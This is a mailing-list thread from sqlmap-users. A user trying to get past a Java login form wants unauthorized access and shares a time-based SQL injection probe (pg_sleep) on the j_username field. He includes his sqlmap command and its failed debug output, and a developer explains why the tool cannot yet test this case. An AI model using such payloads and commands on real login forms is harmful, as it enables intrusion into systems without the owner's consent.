sqlmap-users

[sqlmap-users] Problems with time based sql inj.

[David G. <sk...@gm...>]

I have one site in Java which is only vulnerable to this type of technique
(time-based blind sql inj), where all others simply do not work.

Theoretically speaking, I have a login form that receives 2 parameters from
the user via the POST method, which is the login and password.

I've tried several ways to circumvent this form to gain unauthorized access,
but i not get success in the handling of sql injection. However, nessus
reported that the field is vulnerable to Time-Based Sql Injection by
manipulating the parameter  j_username with the following query:

j_username = ';%20select%20pg_sleep%20(10)--

Tested the failure, I noticed that you can only make a time-based blind sql
injection. But even passing the parameter --time-test for the sqlmap, and
setting the option in sqlmap.conf timetest to true, does not make sqlmap
test time-based sql inj.

# ./sqlmap.py -u "http:/xxxx/xxxx/j_xx_xxx" --data
"action=Login&j_password=&j_username=" -p j_username -v 2 --time-test
--time-sec 4 --dbms postgresql
    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 17:34:40

[17:34:40] [DEBUG] initializing the configuration
[17:34:40] [DEBUG] initializing the knowledge base
[17:34:40] [DEBUG] cleaning up configuration parameters
[17:34:40] [DEBUG] setting the HTTP timeout
[17:34:40] [DEBUG] setting the HTTP method to GET
[17:34:40] [DEBUG] creating HTTP requests opener object
[17:34:40] [DEBUG] forcing back-end DBMS to user defined value
[17:34:40] [DEBUG] parsing XML queries file
[17:34:40] [INFO] using '/home/skys/sqlmap-dev/output/xxx/session' as
session file
[17:34:40] [INFO] testing connection to the target url
sqlmap got a 302 redirect to
http://xxx/xxx/index.html;jsessionid=8EF344E0CF2864CF8DCDF23F730E0F57 - What
target address do you want to use from now on?
http://xxx:80/xxx/j_xxx_xxx(default) or provide another target address
based also on the redirection
got from the application

>
[17:34:41] [WARNING] the testable parameter 'j_username' you provided is not
into the Cookie
[17:34:41] [INFO] testing if the url is stable, wait a few seconds
[17:34:42] [INFO] url is stable
[17:34:42] [INFO] testing sql injection on POST parameter 'j_username' with
0 parenthesis
[17:34:42] [INFO] testing unescaped numeric injection on POST parameter
'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not unescaped numeric
injectable
[17:34:42] [INFO] testing single quoted string injection on POST parameter
'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not single quoted string
injectable
[17:34:42] [INFO] testing LIKE single quoted string injection on POST
parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not LIKE single quoted
string injectable
[17:34:42] [INFO] testing double quoted string injection on POST parameter
'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not double quoted string
injectable
[17:34:42] [INFO] testing LIKE double quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted
string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 0
parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with
1 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric
injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string
injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted
string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string
injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted
string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 1
parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with
2 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric
injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string
injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted
string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string
injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted
string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 2
parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with
3 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric
injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string
injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted
string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string
injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted
string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 3
parenthesis
[17:34:43] [WARNING] POST parameter 'j_username' is not injectable
[17:34:43] [ERROR] all parameters are not injectable

[*] shutting down at: 17:34:43

# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1536
Node Kind: directory
Schedule: normal
Last Changed Author: stamparm
Last Changed Rev: 1536
Last Changed Date: 2010-04-04 11:38:48 -0300 (Sun, 04 Apr 2010)

-- 
David Gomes Guimarães

Re: [sqlmap-users] Problems with time based sql inj.

[Bernardo D. A. G. <ber...@gm...>]

Hi David,

On Mon, Apr 5, 2010 at 21:38, David Guimaraes <sk...@gm...> wrote:
> ...
> I've tried several ways to circumvent this form to gain unauthorized access,
> but i not get success in the handling of sql injection. However, nessus
> reported that the field is vulnerable to Time-Based Sql Injection by
> manipulating the parameter  j_username with the following query:
>
> j_username = ';%20select%20pg_sleep%20(10)--
>
> Tested the failure, I noticed that you can only make a time-based blind sql
> injection. But even passing the parameter --time-test for the sqlmap, and
> setting the option in sqlmap.conf timetest to true, does not make sqlmap
> test time-based sql inj.

sqlmap at first has to detect a boolean-based blind sql injection to
be able to proceed testing for time based blind sql injection (with,
--time-test, yes). This is a design flaw of the tool and will be fixed
in the next months while we will be working on the refactoring of the
detection engine. At the moment you can't use sqlmap to exploit this
kind of sql injection.
By the way, this is detailed in the user's manual[1].

[1] http://sqlmap.sourceforge.net/doc/README.html#ss5.5

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F